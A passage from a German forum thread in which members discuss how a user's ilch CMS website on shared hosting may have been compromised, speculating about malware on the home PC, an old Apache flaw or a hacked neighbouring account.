    21 Beitragspunkte
    Ich bin alle Ordner durchgegangen und habe sie mit dem backup verglichen, alles genau so^^ Also keine neuen Datein sind druff und auch keine, die mir nichts sagen^^

    Mein Rechner wurde gerade neu gemacht, der müsste also sauber sein, kann natürlich sein, dass der Rechner unbemerkt vorher was mit eingeschläust habe^^
    Chat Roulette Chatroulette Baushop
    0 Mitglieder finden den Beitrag gut.
  15. Mi. 21.07.2010 11:13 Uhr #15
    User Pic
    Swamp Mitglied
    Registriert seit
    02.02.2006
    Beiträge
    2.094
    Beitragswertungen
    21 Beitragspunkte
    Was hast du denn für ein Schutz überhaupt drauf?
    Wer zuletzt lacht, hat den schlechtesten Ping.
    0 Mitglieder finden den Beitrag gut.
  16. Mi. 21.07.2010 11:46 Uhr #16
    User Pic
    Botox84 Mitglied
    Registriert seit
    09.08.2006
    Beiträge
    1.190
    Beitragswertungen
    21 Beitragspunkte
    Boar, gute Frage, ist normaler Webspace von Strato,kann ich also gar nicht so beantworten^^ ist also nicht mein Server von Fluesterbase^^
    Chat Roulette Chatroulette Baushop
    0 Mitglieder finden den Beitrag gut.
  17. Mi. 21.07.2010 12:01 Uhr #17
    User Pic
    Swamp Mitglied
    Registriert seit
    02.02.2006
    Beiträge
    2.094
    Beitragswertungen
    21 Beitragspunkte
    Ne, sry. Meinte auf deinem Rechner. zwinker
    Wer zuletzt lacht, hat den schlechtesten Ping.
    0 Mitglieder finden den Beitrag gut.
  18. Mi. 21.07.2010 12:08 Uhr #18
    User Pic
    Botox84 Mitglied
    Registriert seit
    09.08.2006
    Beiträge
    1.190
    Beitragswertungen
    21 Beitragspunkte
    Normales Avira und die windows 7 firerwall, aber wie gesagt, Rechner wurde komplett neu gemacht am WE ^^
    Chat Roulette Chatroulette Baushop
    0 Mitglieder finden den Beitrag gut.
  19. Mi. 21.07.2010 12:09 Uhr #19
    User Pic
    Swamp Mitglied
    Registriert seit
    02.02.2006
    Beiträge
    2.094
    Beitragswertungen
    21 Beitragspunkte
    Ah okay, naja gerade nicht so wirklich vertrauend - für mich zumindestens. zwinker
    Schon jo, aber es hätte ja sein können, dass ein Schädliing voher drauf war und jetzt nicht mehr und somit das Problem nicht mehr besteht. zunge
    Wer zuletzt lacht, hat den schlechtesten Ping.
    0 Mitglieder finden den Beitrag gut.
  20. Mi. 21.07.2010 13:45 Uhr #20
    User Pic
    Ithron Hall Of Fame
    Registriert seit
    21.01.2006
    Beiträge
    2.659
    Beitragswertungen
    24 Beitragspunkte
    Sowas gab es schon öfters. Es ist nach wie vor keine Sicherheitslücke im ilch cms.

    Es gibt 2 Möglichkeiten:

    a) dein Anbieter hat eine veraltete Apache Version, da gab es mal irgend einen exploit um sowas zu erreichen
    b) ein anderer Nutzer deines Anbieters wurde gehackt und der Angreifer hat ein Script wie annemarie es gesagt hat benutzt. In diesem Fall wärst du nicht der einzig betroffene sondern alle anderen Kunden auf dem gleichen Server auch
    ZitatZitat geschrieben von loW

    Ja ich habs gesehen und wenn ichs kostenlos bekomm dann zahl ich doch nix dafür oder?
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Plauder Ecke

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten